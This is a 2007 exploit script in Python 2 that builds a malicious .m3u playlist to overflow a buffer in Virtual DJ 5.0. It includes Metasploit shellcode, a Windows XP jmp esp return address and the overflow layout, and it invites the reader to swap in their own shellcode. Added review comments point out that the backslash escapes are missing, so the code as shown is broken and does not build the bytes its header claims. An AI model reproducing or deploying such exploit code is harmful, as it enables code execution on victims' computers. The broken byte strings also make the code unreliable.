
# Title : Virtual DJ 5.0 (m3u File) Local Buffer OverFlow Exploit
# Published : 2007-09-02
# Author : 0x58


#Virtual DJ 5.0 Local Buffer OverFlow
#224 bytes available for shellcode,, you can replace it with your favourite one,, 
#ret addr -> 0x7199403D      jmp esp in mswsock.dll Winxp sp0
#exploit : [A x 484] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode -224] 
#Discovered by 0x58 && Coded By miyy3t,,Midt's lab !!
#Greetz : M.i.d.t,, Diablos5s5s,, Simo64 ,, s4mi,, issam ,, Metasploit,,Str0ke & All Mor0Ccan & Muslims h4xorz
# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

# Builds the Virtual DJ 5.0 .m3u proof-of-concept described in the header:
# a payload string is assembled in memory and written to a fixed path on
# drive C:. This is a Python 2 script (see the print statement at the end).
#
# Payload, per the header comment: Metasploit win32_exec, CMD=calc.exe,
# 164 bytes, PexFnstenvSub encoder.
# NOTE(review): as shown here the literals contain no backslashes
# ("x33xc9..." rather than "\x33\xc9..."), so Python reads them as ordinary
# ASCII text, not the byte sequences the header describes -- presumably an
# artifact of the archive's rendering; the script as shown does not produce
# what the header claims.
shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x84"
shellcode+= "xd1xfexd8x83xebxfcxe2xf4x78x39xbaxd8x84xd1x75x9d"
shellcode+= "xb8x5ax82xddxfcxd0x11x53xcbxc9x75x87xa4xd0x15x91"
shellcode+= "x0fxe5x75xd9x6axe0x3ex41x28x55x3exacx83x10x34xd5"
shellcode+= "x85x13x15x2cxbfx85xdaxdcxf1x34x75x87xa0xd0x15xbe"
shellcode+= "x0fxddxb5x53xdbxcdxffx33x0fxcdx75xd9x6fx58xa2xfc"
shellcode+= "x80x12xcfx18xe0x5axbexe8x01x11x86xd4x0fx91xf2x53"
shellcode+= "xf4xcdx53x53xecxd9x15xd1x0fx51x4exd8x84xd1x75xb0"
shellcode+= "xb8x8excfx2exe4x87x77x20x07x11x85x88xecx21x74xdc"
shellcode+= "xdbxb9x66x26x0exdfxa9x27x63xb2x9fxb4xe7xffx9bxa0"
shellcode+= "xe1xd1xfexd8"

# Overflow layout from the header: 484 filler characters, the return address
# (header: 0x7199403D, a jmp esp in mswsock.dll on Windows XP SP0 -- so the
# build is tied to that one OS/module build), 10 NOP characters, then the
# payload. The same rendering caveat applies: "x3Dx40x99x71" and "x90" are
# literal ASCII here, not byte escapes.
bof = "A"*484+"x3Dx40x99x71"+"x90"*10+shellcode

# Hard-coded output path; 'w+' truncates any existing file. The local name
# `file` shadows the Python 2 builtin of the same name for the rest of the
# script.
file = open('c:/xploit.m3u','w+')
# M3U header and extended-info line. There is no newline escape in these
# literals either (the trailing "n" is a literal character), so the header,
# the EXTINF line and the oversized path are all emitted on one line.
file.write("#EXTM3Un");
file.write("#EXTINF:0,TITLEn")
# Playlist entry: a drive prefix followed by the overflow string. The
# oversized path component is the part a length-bounded parser would reject,
# and a playlist whose entry is hundreds of repeated bytes is an easy
# signature for content inspection.
file.write("C:/")
file.write(bof)
file.close()

# Python 2 print statement; a SyntaxError on Python 3.
print "Exploit generated in c:/xploit.m3u ...now open it with virtual dj !! "
